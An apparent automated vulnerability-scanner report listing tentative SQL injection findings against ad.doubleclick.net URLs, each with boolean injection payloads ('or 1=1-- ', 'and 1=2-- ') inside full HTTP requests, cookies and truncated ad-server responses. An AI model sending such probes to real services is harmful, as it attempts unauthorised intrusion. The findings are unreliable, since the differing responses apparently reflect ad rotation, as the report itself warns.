1.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [campID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The campID parameter appears to be vulnerable to SQL injection attacks. The payloads 78513079%20or%201%3d1--%20 and 78513079%20or%201%3d2--%20 were each submitted in the campID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=8034078513079%20or%201%3d1--%20&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:28 GMT
Content-Length: 9944

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed May 04 13:42:09 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1620481/tda_activetrader_technology_technology_tradearchitect_ideageneration_tradearchitectoffer_300x250.swf";
var gif = "http://s0.2mdn.net/1620481/tda_activetrader_technology_technology_tradearchitect_ideageneration_tradearchitectoffer_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/3b0/%2a/c%3B240695700%3B0-0%3B0%3B63592959%3B4307-300/250%3B41964175/41981962/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=8034078513079%20or%201%3d1--%20&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=http%3a%2f%2fwww.tdameritrade.com/tradearchitect.html%3Fa%3DSVI%26o%3D201%26cid%3DGENRET%3B877237%3B63592959%3B240695700%3B41964175");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var movie
...[SNIP]...

Request 2

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=8034078513079%20or%201%3d2--%20&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:29 GMT
Content-Length: 10034

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed May 04 13:34:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1620481/tda_activetrader_technology_technology_tradearchitect_options_tradearchitectoffer_300x250.swf";
var gif = "http://s0.2mdn.net/1620481/tda_activetrader_technology_technology_tradearchitect_options_tradearchitectoffer_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/3b0/%2a/y%3B240695700%3B1-0%3B0%3B63592959%3B4307-300/250%3B42006613/42024400/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=8034078513079%20or%201%3d2--%20&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=http%3a%2f%2fwww.tdameritrade.com/tradearchitect.html%3Fa%3DSVI%26o%3D201%26cid%3DGENRET%3B877237%3B63592959%3B240695700%3B42006613");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.subst
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [sz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.287481.RADIUMONE.COM/B5267998.2

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads 16205304'%20or%201%3d1--%20 and 16205304'%20or%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4682.287481.RADIUMONE.COM/B5267998.2;sz=300x250;click=http://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?;ord=1305126159049?16205304'%20or%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2;sz=300x250;click=http://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?;ord=1305126159049?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:44:36 GMT
Content-Length: 5152

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2752994/1-TXU_ClickSwitch_300x250.swf";
var gif = "http://s0.2mdn.net/2752994/1-TXU_ClickSwitch_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/62/%2a/o%3B239320523%3B0-0%3B0%3B62232454%3B4307-300/250%3B40749351/40767138/1%3B%3B%7Esscs%3D%3fhttp://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?http%3a%2f%2fwww.txu.com/residential/promotions/mass/e-saver-12-2011Q1-click-switch-save.aspx%3FPromoCode%3DBNADA1122%26WT.mc_id%3DONLBANeSVR03%26WT.mc_ev%3Dclick");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="http://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/62/%2a/o%3B239320523%3B0-0%3B0%3B62232454%3B4307-300/250%3B40749351/40767138/1%3B%3B%7Esscs%3D%3fhttp://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?"+ct[i]);}else{x=escape(ct[i]);}fv+="&clickTag"+i+"="+x+"&clickTAG"+i+"="+x+"&clicktag"+i+"="+x;}}
fv+='"';
var bgo=(bg=="same as SWF")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="same as SWF")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false")&&(id=="DCF0"))alert('open
...[SNIP]...

Request 2

GET /adi/N4682.287481.RADIUMONE.COM/B5267998.2;sz=300x250;click=http://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?;ord=1305126159049?16205304'%20or%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2;sz=300x250;click=http://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?;ord=1305126159049?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:44:37 GMT
Content-Length: 5120

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2752994/TXU_Mailbox_300x250.swf";
var gif = "http://s0.2mdn.net/2752994/TXU_Mailbox_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/62/%2a/w%3B239320523%3B1-0%3B0%3B62232454%3B4307-300/250%3B40749405/40767192/1%3B%3B%7Esscs%3D%3fhttp://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?http%3a%2f%2fwww.txu.com/residential/promotions/mass/e-saver-12-2011Q1-save-money.aspx%3FPromoCode%3DBNADA1122%26WT.mc_id%3DONLBANeSVR01%26WT.mc_ev%3Dclick");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="http://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/62/%2a/w%3B239320523%3B1-0%3B0%3B62232454%3B4307-300/250%3B40749405/40767192/1%3B%3B%7Esscs%3D%3fhttp://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?"+ct[i]);}else{x=escape(ct[i]);}fv+="&clickTag"+i+"="+x+"&clickTAG"+i+"="+x+"&clicktag"+i+"="+x;}}
fv+='"';
var bgo=(bg=="same as SWF")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="same as SWF")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false")&&(id=="DCF0"))alert('openWindow is wrong.');
...[SNIP]...

1.5. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.2

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000796892/mnum=0000884211/cstr=99211315=_4dcaa461,8861264310,796892%5E884211%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=99211315/optn=64?trg=;ord=8861264310?&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=1029074125&tile=743041020&tug=&site=2&affiliate=20&hcent=892&scent=&pos=113&xpg=4294&sec=&au1=1&au2=1&uri=%2feye-health%2ftc%2fpinkeye-topic-overview&artid=091e9c5e8001e4a7&inst=0&leaf=1160&cc=16&tmg=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:30:23 GMT
Content-Length: 570

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/c/b4/%2a/s;226750343;1-0;0;50154095;2321-160/600;39961085/39978872/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000796892/mnum=0000884211/cstr=99211315=_4dcaa461,8861264310,796892%5E884211%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=99211315/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3A2063"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_160x600_Free2011Score.gif" border=0 alt="Advertisement"></a>');

Request 2

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000796892/mnum=0000884211/cstr=99211315=_4dcaa461,8861264310,796892%5E884211%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=99211315/optn=64?trg=;ord=8861264310?&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=1029074125&tile=743041020&tug=&site=2&affiliate=20&hcent=892&scent=&pos=113&xpg=4294&sec=&au1=1&au2=1&uri=%2feye-health%2ftc%2fpinkeye-topic-overview&artid=091e9c5e8001e4a7&inst=0&leaf=1160&cc=16&tmg=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:30:24 GMT
Content-Length: 557

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/c/b4/%2a/f;226750343;0-0;0;50154095;2321-160/600;39921267/39939054/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000796892/mnum=0000884211/cstr=99211315=_4dcaa461,8861264310,796892%5E884211%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=99211315/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3A2063"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_160x600.gif" border=0 alt="Advertisement"></a>');

